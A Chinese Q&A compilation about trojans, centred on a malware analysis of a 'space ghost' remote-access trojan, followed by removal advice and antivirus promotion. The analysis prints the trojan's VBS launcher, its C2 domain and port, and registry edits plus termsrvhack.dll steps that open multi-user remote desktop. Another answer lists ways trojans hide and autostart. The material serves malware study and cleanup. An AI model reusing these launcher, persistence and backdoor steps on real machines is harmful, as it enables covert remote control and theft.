本文目录一览:
-
3、如何杀木马病毒
“空格幽灵”木马病毒造成的空格键失灵究竟是做了什么手脚?如何手动修复?还有限制关机的问题
样本信息及其dump内存文件
2.1 母体信息
文件名:YqbYbx.exe
类 型:EXE程序
大 小:52,224 字节
文件名:YqbYbx.jpg
类 型:jpg空白图片
大 小:396,445 字节
2.2 释放文件信息
文件名:twain32.dll
类 型:DLL文件
大 小:393,382 字节
路 径: %SystemRoot%\ twain32.dll
文件名:.lnk
类 型:快捷方式
大 小:424 字节
路 径:%开始菜单目录%\ .lnk 和 %我的文档目录%\ .lnk
文件名: .vbs
类 型: vbs脚本文件
大 小:139 字节
路 径:%我的文档目录%\ .lnk
2.3 内存dump文件信息
文件名:Region00E40000-00E91000.dmp
类 型:PE内存dump文件
大 小:331,776 字节
母体行为分析
3.1 母体行为概述
该母体并没有太大的危险性行为,其作用更贴切来说是作为一个Loder,作为病毒程序运行的垫脚石和对迷惑用户感官判断进行迷惑。
3.2 母体YqbYbx.exe行为分析
3.2.1 解密释放出病毒DLL文件:twain32.dll
a) 打开同文件夹下YqbYbx.jpg文件。
b) 定位到文件头偏移 0xBF7 位置处,读取 0x600A6 字节,通过简单的异解密出一个PE文件数据。
c) 将这段数据保存成一个DLL文件,路径在C:\WINDOWS\twain32.dll。
d) 利用rundll32.exe带参数 fuck007启动twain32.dll
启动格式:rundll32.exe "C:\WINDOWS\twain32.dll" fuck007
3.2.2 打开图片YqbYbx.jpg迷惑用户
a) 打开图片YqbYbx.jpg(此图片的文件已经损坏,打开是一个空白的图片)
释放文件行为分析
4.1 释放文件行为概述
释放文件有4个,一个DLL,两个个快捷方式和一个vbs程序。Vbs程序为病毒的再次启动提供多一个路径:通过快捷键启动。DLL文件就是在内存中生成病毒代码,连接远程控制服务器端,和远程控制服务器端交流信息。
4.2 twain32.dll行为分析
4.2.1 再内存进行病毒代码构造
运行的过程中,在内存分配了一个长度为 331776 字节的空间,通过大量数据解密,在这个空间里构造了一个DLL文件结构,然后跳转到这个结构中的代码来运行(已经dump出来了在压缩包中),这个DLL文件是一个远控。并且,远控服务器端域名“weiqi27890.3322.org”作为参数传递进去。
(针对远控的功能在第五章:远控功能分析)
4.3 .vbs行为分析
4.3.1 vbs脚本内容及其解析
SET objShell=Wscript.CreateObject("Wscript.Shell")
On error resume Next
iReturnCode=objShell.Run("rundll32.exe twain32.dll Run",0,TRUE)
此脚本就是利用rundll32.exe 来启动twain32.dll,其执行的时机在下面.lnk文件的分析里
4.4 .lnk行为分析
如下图,是.lnk文件的属性,可以看出,这个快捷方式可以随着空格“space”启动
远控功能分析
5.1 远控功能概述
这是一个功能比较完善的远程控制客户端,可以为服务器端提供查看本机信息,查看本机注册表,查看本地硬盘,上传、下载文件,运行程序,结束程序,及其3389远程桌面多用户登陆,记录键盘等一系列远程功能。
5.2与服务器端建立连接
(1) 查询域名“weiqi27890.3322.org”的IP地址xxx
(2) 建立TCP连接到xxx地址的1234端口
(3) 建立连接后发送本机系统消息进行上线确认
(关于获取本机系统详细信息在5.3)
5.3获取本机系统详细信息
(1) 通过HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
获得CPU的主频
(2) 通过HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 获得CPU的型号
(3) 通过 API函数 GetSystemInfo 获得系统版本信息
(4) GetDriveTypeA 检测从A盘到Z盘是否为可用盘,若果是可用盘,
(5) GeDiskFreeSpaceExA 获得每个盘的大小和可用空间
(6) 打包成一段数据包,发送给服务器端,作为上线信号
5.4记录键盘消息
(1) 接收到服务端的键盘消息指令
(2) 通过自己建立一个键盘表(全部键盘信息)
(3) 不断循环使用API函数GetKeyState测试每个键盘是否按下
(4) 将键盘信息保存到 “病毒路径\keylog.dat” 文件中
(5) 调用文件上传功能把keylog.dat上传
(6) 删除keylog.dat
5.5远程命令行功能
(1) 接收到服务端的远程命令行指令
(2) 后台运行cmd.exe
(3) 新建一个匿名管道,绑定到cmd.exe的输入输出
(4) 通过Tcp连接发送和接收cmd命令,让控制端自由操作
5.6查看进程列表功能,结束进程功能
(1) 接收到服务端的查看进程列表的功能
(2) 利用进程系统快照遍历系统进程
(3) 发送系统快照到服务器
(4) 如果服务器要求结束某进程,先使用(SeDebugPrivilege、LookupPrivilegeValueA、AdjustTokenPrivileges获得系统的权限)再用API函数TerminateProcess结束进程,如果无法结束,则调用调用系统的taskkill.exe /f /pid %d来结束进程。
5.7 DOS攻击功能
(1) 接收到服务端的DDOS攻击指令
(2) 接收到要攻击的IP地址或网站
(3) 创建一个线程,死循环的访问对应的网站或死循环的对IP地址发出连接邀请
(4) 直到收到了结束攻击的指令,才结束刚才创建的攻击进程。
5.8使电脑无法正常关机的功能
(1) 接收到服务端的使电脑无法正常关机的指令
(2) 使用API函数PrivilegeOpera设置SeShutdownPrivilege的属性使得电脑无法正常关机。
(3) 直到收到解除指令才还原设置
5.9设置系统成为可以多用户使用的3389端口远程桌面
(1) 接收到服务器端的设置远程桌面的消息
(2) 对如下注册表进行操作
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon中
KeepRASConnections设置为REG_SZ值为1
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server中
fDenyTSConnections设置为REG_DWORD值为0
HKLM\SYSTEM\CurrentControlSet\control\terminal server\Licensing中
EnableConcurrentSessions设置为REG_DWORD值为1
HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters中
serviceDll设置为REG_EXPAND_SZ值为%SystemRoot%\system32\termsrvhack.dll
(3) 用文件接收功能,接收termsrvhack.dll到文件到C盘根目录下
(termsrvhack.dll这是网上广为流传的用户多用户3389的DLL文件)
(3) 复制c:\termsrvhack.dll到c:\windows\system32\dllcache\termsrvhack.dll
(4) 复制c:\termsrvhack.dll到c:\windows\system32\termsrvhack.dll
5.12 其他功能
其他远控常见功能,如上传下载文件,远程运行文件,删除文件,清除系统记录,查看系统服务,修改IE主页等功能,不做说明。
盗号木马是通过记忆键盘按键的顺序进行盗密还是怎样?
你好:
这个不一定,盗号木马不同的种类使用的方式不同,有记录按键的,也有截取内存的,还有直接截图的(用于盗取虚拟键盘输入的密码)
这些木马都可以使用电脑管家的杀毒功能来查杀的
电脑管家的杀毒部分是采用的4+1引擎,拥有管家云查杀引擎和金山云查杀引擎这两个国内最为犀利的云查杀引擎,而且还有以高查杀著称的德国小红伞引擎作为本地引擎,查杀率特别的高,可以清除各种木马病毒
如果以后有什么问题,欢迎再来电脑管家企业平台询问,我们会尽心为您解答
如何杀木马病毒
小知识:
木马病毒的通用解法
“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。
“木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。
当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,:),“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。
在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。
在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。
在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer 键值改为Explorer=“C:\WINDOWS\expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。
知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后编辑win.ini文件,将[WINDOWS]下面,“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”;编辑system.ini文件,将[BOOT]下面的“shell=‘木马’文件”,更改为:“shell=explorer.exe”;在注册表中,用regedit对注册表进行编辑,先在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索并替换掉“木马”程序,有时候还需注意的是:有的“木马”程序并不是直接将“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下的“木马”键值删除就行了,因为有的“木马”如:BladeRunner“木马”,如果你删除它,“木马”会立即自动加上,你需要的是记下“木马”的名字与目录,然后退回到MS-DOS下,找到此“木马”文件并删除掉。重新启动计算机,然后再到注册表中将所有“木马”文件的键值删除。至此,我们就大功告成了。
请问按键精灵会有木马病毒,会盗号吗?
按键精灵的官方版本,肯定是没有任何的木马病毒的,它是正规软件,不过网上的修改版安全性就不能保证了,为了安全,你可以使用电脑管家的软件管理来安装它,电脑管家的软件管理的软件仓库中提供的软件都是经过管家鉴定的正版程序,肯定不会有任何问题,你可以放心使用
中病毒木马空格键失灵
你好朋友这情况有可能是中了顽固木马了,建议你使用360系统急救箱(它不用安装,解压后就可使用)在带网络安全模式下查杀试试,它是强力查杀木马病毒的系统救援工具,对各类流行的顽固木马查杀效果极佳,如犇牛、机器狗、灰鸽子、扫荡波、磁碟机等。它够强力清除木马和可疑程序,并修复被感染的系统文件,抑制木马再生,是电脑需要急救时最好的帮手。 这样处理应当可以解决。
ewido查出木马病毒之后用哪一个按键删除呀?
点击消息下面的选项 删除/跳过/默认操作(好像是这几项) 然后点击左下角的应用所有操作 就可以了